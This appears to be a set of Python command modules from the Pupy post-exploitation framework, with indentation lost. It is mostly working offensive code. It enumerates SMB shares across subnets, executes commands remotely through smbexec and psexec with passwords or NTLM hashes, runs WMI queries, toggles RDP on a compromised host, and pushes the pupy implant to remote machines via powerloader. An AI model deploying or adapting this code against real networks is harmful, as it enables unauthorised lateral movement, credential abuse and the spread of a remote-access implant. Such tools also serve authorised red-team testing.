def run(self, args):
# Retrieve local shared folders
try:
if args.local:
if self.client.is_windows():
print self.client.conn.modules[
'pupwinutils.drives'].shared_folders()
else:
self.warning(
'this module works only for windows. Try using: run shares remote -t 127.0.0.1'
)
return
except:
pass
# Retrieve remote shared folders
if not args.target:
self.error("target (-t) parameter must be specify")
return
if "/" in args.target:
hosts = IPNetwork(args.target)
else:
hosts = list()
hosts.append(args.target)
connect = self.client.remote('pupyutils.share_enum', 'connect')
for host in hosts:
result = connect(str(host), args.port, args.user, args.passwd,
args.hash, args.domain)
if 'error' in result:
if 'os' in result:
self.error('{}:{} OS={} NAME={}: {}'.format(
host, args.port, result['os'], result['name'],
result['error']))
else:
self.error('{}:{}: {}'.format(host, args.port,
result['error']))
else:
self.success('{}:{} OS=[{}] NAME=[{}] AUTH={}'.format(
host, args.port, result['os'], result['name'],
result['auth']))
shares = [{
'SHARE': x[0],
'ACCESS': x[1]
} for x in result['shares']]
self.table(shares, ['SHARE', 'ACCESS'])
def run(self, args):
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
smbexec = self.client.remote('pupyutils.psexec', 'smbexec')
completions = []
for host in hosts:
if args.command in ('pupy86', 'pupy32', 'pupy64'):
_, completion = powerloader.serve(
self,
self.client.get_conf(),
host=str(host),
port=args.port,
user=args.user,
domain=args.domain,
password=args.passwd,
ntlm=args.hash,
execm=args.execm,
timeout=args.timeout,
arch='x64' if args.command == 'pupy64' else 'x86')
completions.append(completion)
continue
output, error = smbexec(str(host), args.port, args.user,
args.domain, args.passwd, args.hash,
args.command, args.share, args.execm,
args.codepage, args.timeout,
not args.noout)
if output:
self.log(output)
if error:
self.error(error)
if completions:
self.info('Wait for completions')
for completion in completions:
if not completion.is_set():
completion.wait()
def run(self, args):
wql = self.client.remote('pupyutils.psexec', 'wql')
if args.query:
cmdline = ' '.join(args.query)
else:
cmdline = 'SELECT DatabaseDirectory,BuildVersion,LoggingDirectory '\
'FROM Win32_WMISetting'
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
for host in hosts:
try:
columns, values = wql(str(host), args.port, args.user,
args.domain, args.passwd, args.hash,
cmdline, args.timeout)
if not columns:
return
elif len(columns) == 1:
self.log(
List(list(_stringify(x[0]) for x in values),
caption=columns[0]))
else:
if not values:
return
elif len(values) == 1:
records = [{
'KEY': column,
'VALUE': _stringify(values[0][idx])
} for idx, column in enumerate(columns)]
self.log(Table(records, ['KEY', 'VALUE']))
else:
records = [{
column: _stringify(value[idx])
for idx, column in enumerate(columns)
} for value in values]
self.log(Table(records, columns))
except Exception as e:
self.error(e)
def run(self, args):
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
smbexec = self.client.remote('pupyutils.psexec', 'smbexec')
for host in hosts:
output, error = smbexec(host, args.port, args.user, args.domain,
args.passwd, args.hash, args.command,
args.share, args.execm, args.codepage,
args.timeout, not args.noout)
if output:
self.log(output)
if error:
self.error(error)
def run(self, args):
# TO DO: enable multi RDP session, see MIMIKATZ for example
if args.local:
if args.enable or args.disable:
if not self.client.is_windows():
self.error(
"This option could be used only on windows hosts")
return
# check if admin
if not self.client.conn.modules[
"pupwinutils.rdp"].check_if_admin():
self.error("Admin privileges are required")
with redirected_stdio(self):
if args.enable:
self.client.conn.modules["pupwinutils.rdp"].enable_rdp(
)
if args.disable:
self.client.conn.modules[
"pupwinutils.rdp"].disable_rdp()
elif args.remote:
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target)
for host in hosts:
with redirected_stdio(self):
self.client.conn.modules["pupyutils.rdp_check"].check_rdp(
host, args.username, args.password, args.domain,
args.hashes)
def run(self, args):
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
psexec = self.client.remote('pupyutils.psexec', 'psexec', False)
completions = []
for host in hosts:
if args.command in ('pupy86', 'pupy32', 'pupy64'):
_, completion = powerloader.serve(
self,
self.client.get_conf(),
host=str(host),
port=args.port,
user=args.user,
domain=args.domain,
password=args.passwd,
ntlm=args.hash,
execm=args.execm,
timeout=args.timeout,
arch='x64' if args.command == 'pupy64' else 'x86')
if completion:
completions.append(completion)
continue
completion = Event()
def _on_data(data):
if args.verbose:
self.log(u'{}:{}: {}'.format(host, args.port, data))
else:
self.stdout.write(data)
def _on_complete(message):
try:
if message:
self.error(message)
elif message and args.verbose:
self.info('Completed')
finally:
completion.set()
psexec(str(host), args.port, args.user, args.domain, args.passwd,
args.hash, args.command, args.execm, args.codepage,
args.timeout, not args.noout, None, _on_data, _on_complete,
args.verbose)
completions.append(completion)
if completions:
if args.verbose:
self.info('Wait for completions')
for completion in completions:
if not completion.is_set():
completion.wait()
